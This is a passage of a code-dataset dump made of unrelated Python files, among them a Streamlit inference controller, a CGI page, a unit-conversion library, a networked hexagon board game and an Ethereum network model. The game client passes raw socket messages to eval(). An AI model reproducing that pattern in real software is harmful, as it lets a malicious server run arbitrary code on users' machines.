df[df['clusters']==cluster]\n current_cluster_data = current_cluster_data.drop(['clusters'],axis=1)\n model = all_models.get(cluster)\n predicted_labels = model.predict(current_cluster_data)\n predicted_labels = predicted_labels.astype(int)\n predicted_labels = label_encoder.inverse_transform(predicted_labels)\n current_cluster_data['predictions'] = 
predicted_labels\n final_predictions = pd.concat([final_predictions,current_cluster_data])\n \n return final_predictions\n\n\n\n def run_inferencing(self):\n with st.spinner(\"Loading validated data from DB...\"):\n df = self._load_data()\n\n with st.spinner(\"Loading models from repository...\"):\n # self._all_models = list(more_itertools.flatten(self._model_utils.get_all_models_info()))\n self._all_models = self._model_utils.get_all_models_info()\n\n with st.spinner('Clustering data'):\n df = self._cluster_data(df)\n\n with st.spinner('Getting Predictions..'):\n st.info('Predictions:')\n final_predictions = self._make_predictions_for_clusters(df)\n st.write(final_predictions)\n\n with st.spinner('Writing Predictions to file..'):\n # file_utils = FileUtils(self._logger,os.path.join('.','data'))\n # predictions_save_path = file_utils.create('final_predictions',delete_before_creation=True)\n # predictions_save_path= os.path.join(predictions_save_path,'predictions.csv')\n final_predictions.to_csv('./data/final_predictions/predictions.csv',index=False)\n\n","sub_path":"Machine_Learning_Projects/Thyroid_Detection/inference/inference_controller.py","file_name":"inference_controller.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547401003","text":"#!/usr/bin/env python\nimport cgi\nimport cgitb\ncgitb.enable()\nimport os\nimport datetime\n\n\ndefault = \"No Value Present\"\n\n\nprint(\"Content-Type: text/html\")\nprint(\"\")\n\nthis_day = datetime.datetime.today()\n\nbody = \"\"\"\n\nLab 1 - CGI experiments by Dennis Lee\n\n\n
\n    Hey there, this page has been generated by {software}, running {script}.\n\n    \n\n\n    Today is {month} {date}, {year}.\n\n    \n\n\n    This page was requested by IP Address {client_ip}.\n
    \n\n\"\"\".format(\n software=os.environ.get('SERVER_SOFTWARE', default),\n script=os.environ.get('SCRIPT_NAME', default),\n month=this_day.strftime(\"%B\"),\n date=this_day.day,\n year=this_day.year,\n client_ip=os.environ.get('REMOTE_ADDR')\n)\nprint(body)\n","sub_path":"cgi-bin/cgi_2.py","file_name":"cgi_2.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614951023","text":"import numpy as np\n\n\nif __name__ == \"__main__\":\n X = np.array([[1, 2, 3], [5, 2, 1], [8, 3, 1], [5, 2, 1]])\n\n match = [5, 2, 1]\n\n\n a = [x for x in a if x != [1,1]]\n\n \n # print(X.shape)\n # exit()\n\n # # Get sum squares err\n # X_hat = np.sum(np.mean(X_test)) / n_samples\n # # X_means = [np.mean(x_mat) for x_mat in X_test]\n # reconstruct_X_test = model.inverse_transform(W_test)\n\n # SS_err = np.sum(X_test - reconstruct_X_test)**2\n # SS_tot = np.sum(X_test - X_hat)**2\n\n # fuv = SS_err / SS_tot\n # print(fuv)\n\n # test_error = _beta_divergence(X_test, W_test, model.components_, 'frobenius', square_root=False)\n # k_error_dict[i].append(test_error)\n\n # print(\"rep: \", rep, \" k: \", i, \"mean test error: \", np.mean(k_error_dict[i]))\n","sub_path":"data_analysis_notebook/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477585878","text":"'''\nCreated on Oct 19, 2011\n\n@author: steger, jozsef\n@organization: ELTE\n@contact: steger@complex.elte.hu\n'''\nfrom DataError import UnitError\n\nclass UnitManager(object):\n '''\n @summary: the unit container\n \n @note: The relationship between various unit, describing the derivation paths are not stored in this model,\n because this information can be inferred from the dimension derivations, represented in the L{DimensionManager}.\n @note: Units that are formed by prepending a unit prefix (L{Prefix}) are dealt as a L{DerivedUnit}.\n \n @ivar units: container of known units\n @type units: dict(str: L{Unit})\n @ivar conversionpaths: is a map of operations to carry out from a unit to get a different unit\n @type conversionpaths: dict((L{Unit}, L{Unit}): (callable, args))\n @ivar basins: indicates the derivatives of a basic unit\n @type basins: dict(L{BasicUnit}: set(L{Unit}))\n @ivar duplicatesymbols: collection of unit symbols, which more than one unit may bare\n @type duplicatesymbols: set(str)\n '''\n\n class Unit(object):\n '''\n @summary: common skeleton of all units\n @ivar manager: reference to the unit manager\n @type manager: L{UnitManager}\n @ivar reference: unique reference of the unit\n @ivar symbol: short form of the unit\n @type symbol: str\n '''\n def __init__(self, manager, reference, symbol, ancestor):\n '''\n @summary: bind and store common information of the unit\n @param manager: the unit manager\n @type manager: L{UnitManager}\n @param reference: a unique identifier\n @param symbol: short human readable representation of the unit\n @type symbol: str\n @param ancestor: the ancestor of this unit is deriving from\n @type ancestor: L{Unit}\n '''\n self._data = (manager, reference, symbol)\n self._ancestor = ancestor\n @property\n def manager(self):\n return self._data[0]\n @property\n def reference(self):\n return self._data[1]\n @property\n def symbol(self):\n return self._data[2]\n def __str__(self):\n return self.symbol\n def __eq__(self, u):\n return self._data == u._data\n\n class BasicUnit(Unit):\n '''\n 
@summary: a unit axiom\n '''\n def __init__(self, manager, reference, symbol):\n '''\n @summary: constructor\n A BasicUnit is an instance of either set of BaseUnit, ProductUnit and PowerUnit as of the information model.\n @param manager: a reference to the unit manager\n @type manager: L{UnitManager} \n @param reference: the reference to the unit\n @param symbol: an abbreviation for the unit\n @type symbol: str\n '''\n UnitManager.Unit.__init__(self, manager, reference, symbol, None)\n \n class DerivedUnit(Unit):\n '''\n @summary: a unit deriving from various known units\n '''\n def __init__(self, manager, reference, symbol, ancestor):\n '''\n @summary: constructor\n A DerivedUnit is an instance of either set of LinearTransformedUnit and RegexpScaledUnit as of the information model.\n Also units that have any unit prefix fall in this set.\n @param manager: a reference to the unit manager\n @type manager: L{UnitManager} \n @param reference: the reference to the unit\n @param symbol: an abbreviation for the unit\n @type symbol: str\n @param ancestor: the neighbor unit, whose derivative this instance is.\n @type ancestor: L{Unit}\n '''\n UnitManager.Unit.__init__(self, manager, reference, symbol, ancestor)\n \n \n def __init__(self):\n '''\n @summary: constructor\n '''\n self.units = {}\n self.conversionpaths = {}\n self.basins = {}\n self.duplicatesymbols = set()\n \n def __contains__(self, item):\n '''\n @summary: check the existence of a unit\n @param item: a unit or its symbol\n @type item: L{Unit} or str\n @return: True if the unit is known by the L{UnitManager}\n @rtype: bool\n @raise L{UnitError}: Wrong item type\n '''\n units = set(self.units.values())\n if isinstance(item, self.Unit):\n return item in units\n elif isinstance(item, str):\n for unit in units:\n if unit.symbol == item:\n return True\n return False\n else:\n raise UnitError(\"Wrong item type %s\" % item)\n \n def __len__(self):\n '''\n @summary: the number of units known by the L{UnitManager}\n @return: the number of units known by the L{UnitManager}\n @rtype: int\n '''\n return len(self.units)\n\n @staticmethod\n def intORfloat(x):\n '''\n @summary: a conversion helper to read out a value as a number\n @param x: a number\n @type x: str\n @return: the number converted to integer or floating point decimal\n @rtype: int or float\n '''\n if isinstance(x, str):\n try:\n return int(x)\n except ValueError:\n return float(x)\n else:\n return float(x)\n\n def __getitem__(self, reference):\n '''\n @summary: look up the unit in the L{UnitManager} using its reference\n @param reference: the reference to the unit\n @return: the unit found\n @rtype: L{Unit}\n @raise L{UnitError}: Unit with reference not found\n '''\n if self.units.has_key(reference):\n return self.units[reference]\n raise UnitError(\"Unit with reference %s not found\" % reference)\n\n def newBasicUnit(self, reference, symbol):\n '''\n @summary: generate a new basic unit\n @param reference: the reference to the unit\n @param symbol: a short form of the unit\n @type symbol: str\n @return: the new unit\n @rtype: L{BasicUnit}\n @raise L{UnitError}: Unit with reference exists\n '''\n if self.units.has_key(reference): \n raise UnitError(\"Unit with reference %s exists\" % reference)\n if UnitManager.__contains__(self, symbol):\n self.duplicatesymbols.add(symbol)\n unit = self.BasicUnit(self, reference, symbol)\n self.units[reference] = unit\n self.basins[unit] = set([unit])\n self.__dict__[reference] = unit\n return unit\n\n def addLinearTransformedUnit(self, reference, 
symbol, derivedfrom, scale, offset = 0):\n '''\n @summary: generate a derived unit\n @param reference: the reference to the unit\n @param symbol: a short form of the unit\n @type symbol: str\n @param derivedfrom: the neighbor unit\n @type derivedfrom: L{Unit}\n @param scale: scaling factor for the linear transformation\n @type scale: float\n @param offset: the shift in the linear transformation, defaults to 0\n @type offset: float \n @return: the new unit\n @rtype: L{DerivedUnit}\n @raise L{UnitError}: Wrong type of derivedfrom / Unit not found / Unit with reference exists / Cannot extend basin with unit, because Unit not found\n '''\n if not isinstance(derivedfrom, self.Unit):\n raise UnitError(\"Wrong type of derivedfrom %s\" % derivedfrom)\n if not UnitManager.__contains__(self, str(derivedfrom)):\n raise UnitError(\"Unit %s not found\" % derivedfrom)\n if self.units.has_key(reference): \n raise UnitError(\"Unit with reference %s exists\" % reference)\n unit = self.DerivedUnit(self, reference, symbol, derivedfrom)\n basic = derivedfrom\n while basic._ancestor:\n basic = basic._ancestor\n if not self.basins.has_key(basic):\n raise UnitError(\"Cannot extend basin with unit %s, because Unit %s not found\" % (unit, basic))\n if UnitManager.__contains__(self, symbol):\n self.duplicatesymbols.add(symbol)\n self.units[reference] = unit\n self.conversionpaths[(unit, derivedfrom)] = (self.op_lt_forward, (scale, offset))\n self.conversionpaths[(derivedfrom, unit)] = (self.op_lt_inverse, (scale, offset))\n self.basins[basic].add(unit)\n self.__dict__[reference] = unit\n return unit\n\n def addRegexpTransformedUnit(self, reference, symbol, derivedfrom, expr_forward, expr_inverse):\n '''\n @summary: generate a derived unit\n @param reference: the reference to the unit\n @param symbol: a short form of the unit\n @type symbol: str\n @param derivedfrom: the neighbor unit\n @type derivedfrom: L{Unit}\n @param expr_forward: the expression driving the forward transformation\n @type expr_forward: str\n @param expr_inverse: the expression driving the inverse transformation\n @type expr_inverse: str\n @return: the new unit\n @rtype: L{DerivedUnit}\n @raise L{UnitError}: Wrong type of derivedfrom / Unit not found / Unit with reference exists / Cannot extend basin with unit, because Unit not found\n '''\n if not isinstance(derivedfrom, self.Unit):\n raise UnitError(\"Wrong type of derivedfrom %s\" % derivedfrom)\n if not UnitManager.__contains__(self, str(derivedfrom)):\n raise UnitError(\"Unit %s not found\" % derivedfrom)\n if self.units.has_key(reference): \n raise UnitError(\"Unit with reference %s exists\" % reference)\n unit = self.DerivedUnit(self, reference, symbol, derivedfrom)\n basic = derivedfrom\n while basic._ancestor:\n basic = basic._ancestor\n if not self.basins.has_key(basic):\n raise UnitError(\"Cannot extend basin with unit %s, because Unit %s not found\" % (unit, basic))\n if UnitManager.__contains__(self, symbol):\n self.duplicatesymbols.add(symbol)\n self.units[reference] = unit\n self.conversionpaths[(unit, derivedfrom)] = (self.op_rt_forward, expr_forward)\n self.conversionpaths[(derivedfrom, unit)] = (self.op_rt_inverse, expr_inverse)\n self.basins[basic].add(unit)\n self.__dict__[reference] = unit\n return unit\n\n def getBasinByUnit(self, unit):\n '''\n @summary: return the set of units, which are compatible with a given unit\n @param unit: the unit to look up\n @type unit: L{Unit}\n @return: the set of compatible units\n @rtype: set(L{Unit})\n @raise L{UnitError}: not found\n '''\n 
for basin in self.basins.values():\n if unit in basin:\n return basin\n raise UnitError(\"Basin for unit %s not found\" % unit)\n\n def getBasinByReference(self, reference):\n '''\n @summary: look up the compatible units of a given unit with the calling reference\n @param reference:\n @return: the set of compatible units\n @rtype: set(L{Unit})\n @raise L{UnitError}: not found\n '''\n try:\n unit = self[reference]\n return self.getBasinByUnit(unit)\n except UnitError:\n raise UnitError(\"Basin for unit reference %s not found\" % reference)\n\n def op_lt_forward(self, value, so):\n (scale, offset) = so\n def op(value):\n return scale * self.intORfloat( value ) + offset\n if isinstance(value, list):\n return map(lambda x: op(x), value)\n return op(value)\n\n def op_lt_inverse(self, value, so):\n (scale, offset) = so\n def op(value):\n return (self.intORfloat( value ) - offset) / float(scale)\n if isinstance(value, list):\n return map(lambda x: op(x), value)\n return op(value)\n\n def op_rt_forward(self, value, expression):\n def op(value):\n raise UnitError(\"not implemented\")\n if isinstance(value, list):\n return map(lambda x: op(x), value)\n return op(value)\n\n op_rt_inverse = op_rt_forward\n\n def convert(self, value, from_unit, to_unit):\n '''\n @summary: convert a value of one unit to the other\n @param value: input value in from_unit\n @param from_unit: the original unit of the input value\n @type from_unit: L{Unit}\n @param to_unit: the requested new unit\n @type to_unit: L{Unit}\n @raise L{UnitError}: unknown unit / incompatible units\n '''\n if not UnitManager.__contains__(self, str(from_unit)):\n raise UnitError(\"Unknown from_unit\")\n if not UnitManager.__contains__(self, str(to_unit)):\n raise UnitError(\"Unknown to_unit\")\n if from_unit == to_unit:\n return value\n\n while from_unit._ancestor:\n op, oparg = self.conversionpaths[(from_unit, from_unit._ancestor)]\n value = op(value, oparg)\n from_unit = from_unit._ancestor\n heap = []\n while to_unit._ancestor:\n op, oparg = self.conversionpaths[(to_unit._ancestor, to_unit)]\n heap.append((op, oparg))\n to_unit = to_unit._ancestor\n if from_unit != to_unit:\n raise UnitError(\"Different base units %s %s\" % (from_unit, to_unit))\n while len(heap):\n op, oparg = heap.pop(0)\n value = op(value, oparg)\n return value\n\n","sub_path":"Monitoring/MonitoringService/DataProcessing/Unit.py","file_name":"Unit.py","file_ext":"py","file_size_in_byte":13571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211806979","text":"#! 
/usr/bin/env python\n\nT = int(input())\n\nfor t in range(1, T+1):\n n, s = input().split()\n n = int(n)\n ss = [ord(x) - ord('0') for x in s]\n need = 0\n now = 0\n for i, x in enumerate(ss):\n if now < i:\n need += i - now\n now = i\n now += x\n\n print(\"Case #{}: {}\".format(t, need))\n \n","sub_path":"solutions_5639104758808576_0/Python/LeoMao/pa.py","file_name":"pa.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292755740","text":"import csv\nimport ConfigParser\nimport glob, os\n\t\nconfig = ConfigParser.RawConfigParser()\n\t\ntry: \n\tproperties = config.read('config.ini')\n\trows = int(config.get('CONFIGURATION', 'number_of_rows').strip('\"'))\n\tposition = int(config.get('CONFIGURATION', 'position_to_be_corrected').strip('\"'))\n\tdelimiter = config.get('CONFIGURATION', 'delimiter').strip('\"')\n\tsubstitute = config.get('CONFIGURATION', 'substitute').strip('\"')\n\nexcept (ConfigParser.NoSectionError, ConfigParser.NoOptionError):\n\trows = 20\n\tposition = 5\n\tdelimiter = ';'\n\tsubstitute = ''\n\nos.chdir(\"files/\")\nfor f in glob.glob(\"*.csv\"):\n\tif \"modified\" not in f:\n\t\tinput = open(f, 'rb')\n\t\tfile = csv.reader(input, delimiter=delimiter)\n\t\t\n\t\ttext = []\n\t\tfor row in file:\t\n\t\t\tnew_row = []\n\t\t\t\n\t\t\tif(len(row) > rows):\n\t\t\t\t\n\t\t\t\tdifference = len(row) - rows;\n\t\t\t\tnew_row = row[0:position-1]\n\t\t\t\tdescription = row[position-1:position+difference]\n\t\t\t\tdescription = substitute.join(description)\n\t\t\t\tnew_row.append(description)\n\t\t\t\tnew_row.extend(row[position+difference:])\n\t\t\t\ttext.append(new_row)\n\t\t\telse:\n\t\t\t\ttext.append(row)\n\n\t\twith open(os.path.splitext(os.path.basename(f))[0] + '_modified.csv', 'wb') as output:\n\t\t\tdestination = csv.writer(output, delimiter=';')\n\t\t\tdestination.writerows(text)\n\t\t\t\n\t\tinput.close()\n\t\toutput.close()","sub_path":"CSVCorrectorBETA.py","file_name":"CSVCorrectorBETA.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"398932856","text":"# =============================================================================\n'''\nQuick description of the file\n'''\n# =============================================================================\n__author__ = 'Simon Lassourreuille & Loizel Antoine'\n__version__ = ''\n__date__ = '26/01/2017'\n__email__ = 'simon.lassourreuille@etu.u-bordeaux.fr & antoine.loizel@etu.u-bordeaux.fr'\n__status__ = 'TD'\n# =============================================================================\nimport socket\nimport threading\nimport tkinter as tk\nfrom cmath import rect\nfrom math import pi, cos, sqrt\n\nfrom PIL import Image, ImageTk\n\nimport network\nfrom Main import *\n\n\n# =============================================================================\ndef load_image(path, resize=None):\n image = Image.open(path)\n if resize:\n image.thumbnail(resize, Image.ANTIALIAS)\n return ImageTk.PhotoImage(image)\n\n# =============================================================================\nclass Game(tk.Tk):\n def __init__(self, p = Plateau(5, 7), online=True):\n # Init of tk window\n tk.Tk.__init__(self)\n self.title(\"You Lost The Game\")\n\n # Attributes\n self.p = p\n self.width = 40\n self.player = 0\n self.__hexagons = {}\n self.__images = {}\n self.__tokens = []\n self.__victory = []\n self.finished = False\n\n # Init of tk canvas\n 
self.canvas = Workspace(self, p.hauteur, self.width)\n self.canvas.pack(expand=True, fill='both')\n self.canvas['height'] = self.p.hauteur * self.width * 1.7\n self.canvas['width'] = (2 * self.p.largeur + self.p.hauteur // 2) * 1.08 * self.width\n\n # Images init\n size = (self.width*2,self.width*2)\n for i in range(3):\n if i > 0:\n self.__images[i, '_'] = load_image(\"Sprites/Hexagon {} _.png\".format(i), size)\n if i < 2:\n self.__tokens.append(load_image(\"Sprites/Token {}.png\".format(i),(self.width,self.width)))\n self.__victory.append(load_image(\"Sprites/Victory {}.png\".format(i+1)))\n self.__images[i] = load_image(\"Sprites/Hexagon {}.png\".format(i), size)\n\n # Bindings\n self.bind('', self.on_click)\n self.bind('', self.test)\n self.bind('', self.replay)\n self.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n\n # Networking\n if online:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # self.socket.connect(('192.168.173.1', network.PORT))\n self.socket.connect(('127.0.0.1', network.PORT))\n print(\" Connected to the server \".center(80, \"=\"))\n thread = threading.Thread(target=self.server_input, daemon=True)\n thread.start()\n self.token = 0\n\n print(\"=\" * 30 + \" Game Started \" + \"=\" * 30)\n self.reset()\n self.display()\n self.mainloop()\n\n # -------------------------------------------------------------------------\n def server_input(self):\n rest = bytes()\n while True:\n try:\n # blocks\n (msgs, rest) = network.recv_msgs(self.socket, rest)\n for msg in msgs:\n self.handle_requests(msg)\n except ConnectionError:\n print('Connection to server closed')\n self.socket.close()\n break\n\n # -------------------------------------------------------------------------\n def handle_requests(self, request):\n print(\"received request : \", request)\n eval(request)\n\n # -------------------------------------------------------------------------\n def reset(self):\n # Reset the Plateau\n self.finished = False\n self.p = Plateau(self.p.largeur, self.p.hauteur)\n self.p[0].valeur = NOIR\n self.p[-1].valeur = NOIR\n self.p[0, self.p.largeur - 1].valeur = BLANC\n self.p[self.p.hauteur - 1, 0].valeur = BLANC\n self.token = 0\n self.display()\n self.random()\n\n # -------------------------------------------------------------------------\n def check_victory(self):\n if (not self.p.jouables(NOIR)) or (not self.p.jouables(BLANC)):\n if self.p.jouables(NOIR):\n self.p.jouables(NOIR)[0].valeur = NOIR\n elif self.p.jouables(BLANC):\n self.p.jouables(BLANC)[0].valeur = BLANC\n self.display()\n if len(self.p.libres) > 0:\n self.after(1750, self.check_victory)\n else :\n self.on_game_end()\n\n # -------------------------------------------------------------------------\n def on_game_end(self):\n self.finished = True\n scores = [len(list(filter(lambda x: x.valeur == color, self.p.configuration))) for color in (BLANC, NOIR)]\n winner = 0 if scores[0] > scores[1] else 1\n self.canvas.create_image(self.winfo_width() * 0.5, self.winfo_height() * 0.5, image=self.__victory[winner])\n\n # -------------------------------------------------------------------------\n def replay(self, unused_ev):\n if self.finished:\n network.send_msg(self.socket, \"replay\")\n\n # ------------------------------------------------------------------------\n def random(self):\n if self.token == self.player and self.p.jouables([BLANC,NOIR][self.player]):\n cell = self.select(self.p.jouables([BLANC,NOIR][self.player]))\n i,j = self.p.pos2coord(cell.position)\n network.send_msg(self.socket, \"click {} 
{}\".format(i, j))\n self.check_victory()\n self.after(75, self.random)\n\n def select(self, jouables):\n color = [NOIR, BLANC][self.player]\n best_cell, score = None, -1\n for cell in jouables:\n if cell.force(color) >= score:\n score = cell.force(color)\n best_cell = cell\n return best_cell\n\n # ------------------------------------------------------------------------\n def on_closing(self):\n # Some code\n print(\"\\n\" + \"=\" * 31 + \" Game Ended \" + \"=\" * 31)\n self.destroy()\n\n # -------------------------------------------------------------------------\n def __getitem__(self, item):\n return self.__hexagons.__getitem__(item)\n\n # -------------------------------------------------------------------------\n def __setitem__(self, key, value):\n self.__hexagons.__setitem__(key, value)\n\n # -------------------------------------------------------------------------\n def play(self, i, j, color=None):\n color = [BLANC, NOIR][self.token] if color == None else color\n self.p[i, j].valeur = color\n for cell in self.p[i, j].voisins:\n if cell.valeur != VIDE and cell.valeur != color:\n cell.valeur = color\n self.display()\n self.check_victory()\n\n # -------------------------------------------------------------------------\n def test(self, ev):\n x = self.winfo_pointerx() - self.winfo_rootx()\n y = self.winfo_pointery() - self.winfo_rooty()\n for (i, j), hex in self.__hexagons.items():\n if hex.enter(x, y):\n pass\n\n # -------------------------------------------------------------------------\n def on_click(self, ev):\n print(\"Player :\", self.player, \"Token :\", self.token)\n for (i, j), hex in self.__hexagons.items():\n if hex.enter(ev.x, ev.y) and self.p[i, j].estAccessible([BLANC,NOIR][self.player]):\n network.send_msg(self.socket, \"click {} {}\".format(i, j))\n\n # -------------------------------------------------------------------------\n def display(self):\n self.canvas.delete(\"all\")\n\n self.canvas.create_image(self.width/2, self.width/1.8, image=self.__tokens[self.token])\n for x in self.p.configuration:\n i,j = self.p.pos2coord(x.position)\n p = self.canvas.coord2pixels((i, j),\n origin=((self.p.hauteur // 2) * 2 * self.width) * 1J + self.width)\n self[i, j] = Hexagon(self.width, int(p.real), int(p.imag))\n index = {VIDE: 0, BLANC: 1, NOIR: 2}[self.p[i, j].valeur]\n image = self.__images[index]\n self.canvas.create_image(p.real, p.imag, image=image, tags=(\"%s,%s\") % (i, j))\n # if True :\n # self.canvas.create_text(p.real, p.imag, text = str((i,j)))\n\n# =============================================================================\ndef create_complex(create):\n \" Décorateur pour permettre l'utilisation de complexes comme coordonnées \"\n def decorator(*args, **kwargs):\n newargs = []\n for element in args:\n if type(element) is complex:\n newargs += [element.real] + [element.imag]\n else:\n newargs.append(element)\n create(*newargs, **kwargs)\n\n return decorator\n# =============================================================================\n\nclass Workspace(tk.Canvas):\n def __init__(self, master, h, w, *args, **kwargs):\n tk.Canvas.__init__(self, master, *args, bg='#FFFFFF', **kwargs)\n self.create_polygon = create_complex(self.create_polygon)\n self.create_line = create_complex(self.create_line)\n self.board_height = h\n self.hexagon_width = w\n\n # -------------------------------------------------------------------------\n @create_complex\n def create_hexagon(self, width, x, y=None, angle = pi / 6):\n if y is None: x, y = x.real, x.imag\n points = []\n for i in 
range(6):\n points.append(x + y * 1j + rect(width, angle + i * (pi / 3)))\n self.create_polygon(*points, fill='white', outline='black')\n\n # -------------------------------------------------------------------------\n def coord2pixels(self, coords, origin = 50 + 200 * 1J):\n v = [rect(self.hexagon_width, pi / 6 + i * (pi / 3)) for i in range(6)]\n k = v[-1] + v[-2] if (coords[0] - self.board_height // 2) <= 0 else v[0] + v[1]\n return origin + coords[1] * (v[0] + v[-1]) + abs(coords[0] - self.board_height // 2) * k\n # -------------------------------------------------------------------------\n\n# =============================================================================\nclass Hexagon(object):\n id = 0\n\n def __init__(self, width, x, y, tag = ''):\n \"\"\" Stocke les coordonnées et dimensions d'un Hexagone\"\"\"\n self.tag = tag if tag else str(Hexagon.id)\n Hexagon.id += 1\n self.width = width\n self.x, self.y = x, y\n\n # -------------------------------------------------------------------------\n def enter(self, x, y):\n p = abs(self.x - x) + abs(self.y - y) * 1j\n if sqrt(p.real ** 2 + p.imag ** 2) > self.width:\n return False\n # |- - _ _\n # | - - _ _\n # | triangle - - _ _\n # | - - _ _\n # | |\n # | |\n # | Rectangle | height\n # | |\n # | ___________width_____________ |\n width = self.width * cos(pi / 6)\n height = sqrt(self.width ** 2 - width ** 2)\n # First : rectangle check\n if p.real < width and p.imag < height:\n return True\n # Second : triangle check\n p0 = 0 + height * 1j\n p1 = width + height * 1j\n p2 = 0 + self.width * 1j\n Area = 0.5 * (-p1.imag * p2.real + p0.imag * (-p1.real + p2.real)\n + p0.real * (p1.imag - p2.imag) + p1.real * p2.imag)\n s = 1 / (2 * Area) * (p0.imag * p2.real - p0.real * p2.imag +\n (p2.imag - p0.imag) * p.real + (p0.real - p2.real) * p.imag)\n t = 1 / (2 * Area) * (p0.real * p1.imag - p0.imag * p1.real +\n (p0.imag - p1.imag) * p.real + (p1.real - p0.real) * p.imag)\n\n if s > 0 and t > 0 and 1 - s - t > 0:\n return True\n return False\n # -------------------------------------------------------------------------\n\n\nif __name__ == '__main__':\n game = Game()\n","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":12214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377269458","text":"from PIL import Image\nimport tensorflow as tf\nimport numpy as np\nimport glob\n\nflags = tf.app.flags\nflags.DEFINE_string('img_dir', '/home/plantvillage/Dropbox/Object_Detection/warehouse/Cassava/images/cassava_dashboard/cassava_capture/unsorted_images_backup', 'Path to the directory of images')\nFLAGS = flags.FLAGS\n\n\nimg_dir = FLAGS.img_dir\ni = 0\nj = 0\n# Read in images using Pillow\nfor img_path in glob.glob(img_dir + '*'):\n j+=1\n for second_img_path in glob.glob(img_dir + '*'):\n if img_path != second_img_path:\n if i % 100 == 0:\n print('Inside loop: %d\\tOutside loop: %d' % (i, j))\n i+=1\n image = Image.open(img_path)\n comp_image = Image.open(second_img_path)\n\n (comp_img_width, comp_img_height) = comp_image.size\n comp_image_np = np.array(comp_image.getdata()).reshape(\n (comp_img_width, comp_img_height, 3)).astype(np.uint8)\n\n # Convert image into numpy array\n (im_width, im_height) = image.size\n image_np = np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n # Look at all columns and all channels of a single row\n row = 0\n comp_row = comp_image_np[row,:,:]\n og_row = image_np[row, :, :]\n\n if np.array_equal(og_row, 
comp_row):\n print('Found Duplicate!!')\n print('First image:' + img_path)\n print('Second image:' + second_img_path)","sub_path":"tools/check_exact_duplicates.py","file_name":"check_exact_duplicates.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194863608","text":"import time\nfrom typing import Set, Optional, Sequence, Tuple, Dict\nfrom dataclasses import dataclass, field\n\nfrom model.specs import (\n VALIDATOR_REGISTRY_LIMIT,\n ValidatorIndex, Slot,\n BeaconState, Attestation, SignedBeaconBlock,\n)\nfrom model.validatorlib import (\n BRValidator, SyncCommitteeBundle\n)\n\nfrom eth2spec.utils.ssz.ssz_typing import Container, List, uint64\n\nlog = False # set to True to receive an avalanche of messages\n\nclass NetworkSetIndex(uint64):\n pass\n\n@dataclass\nclass NetworkSet(object):\n validators: List[ValidatorIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass NetworkAttestation(object):\n item: Attestation\n info_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass NetworkSyncCommittee(object):\n item: SyncCommitteeBundle\n info_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass NetworkBlock(object):\n item: SignedBeaconBlock\n info_sets: List[NetworkSetIndex, VALIDATOR_REGISTRY_LIMIT]\n\n@dataclass\nclass Network(object):\n validators: List[BRValidator, VALIDATOR_REGISTRY_LIMIT]\n sets: List[NetworkSet, VALIDATOR_REGISTRY_LIMIT]\n\n # In a previous implementation, we kept attestations and blocks in the same queue.\n # This was unwieldy. We can extend this easily by adding `Attester/ProposerSlashing`s\n attestations: List[NetworkAttestation, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n sync_committees: List[SyncCommitteeBundle, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n blocks: List[NetworkBlock, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n\n # We have the possibility of malicious validators refusing to propagate messages.\n # Unused so far and untested too.\n malicious: List[ValidatorIndex, VALIDATOR_REGISTRY_LIMIT] = field(default_factory=list)\n\ndef get_all_sets_for_validator(network: Network, validator_index: ValidatorIndex) -> Sequence[NetworkSetIndex]:\n # Return indices of sets to which the validator belongs\n\n return [i for i, s in enumerate(network.sets) if validator_index in s.validators]\n\ndef get_all_sets_for_validators(\n network: Network,\n validator_indices: Sequence[ValidatorIndex]\n) -> Sequence[NetworkSetIndex]:\n # Return indices of sets to which validators in `validator_indices` belong\n\n return [i for i, s in enumerate(network.sets) if len(set(s.validators) & set(validator_indices)) > 0]\n\ndef items_known_by_sets(network: Network, info_sets: Sequence[NetworkSetIndex]) -> Dict[str, Sequence[Container]]:\n # Known network items of network sets `info_sets`\n\n known_attestations = [item for item in network.attestations if len(set(item.info_sets) & info_sets) > 0]\n known_sync_committees = [item for item in network.sync_committees if len(set(item.info_sets) & info_sets) > 0]\n known_blocks = [item for item in network.blocks if len(set(item.info_sets) & info_sets) > 0]\n return {\n \"attestations\": known_attestations,\n \"sync_committees\": known_sync_committees,\n \"blocks\": known_blocks,\n }\n\ndef knowledge_set(network: Network, validator_index: ValidatorIndex) -> Dict[str, Sequence[Container]]:\n # Known network items of validator `validator_index`\n\n info_sets = 
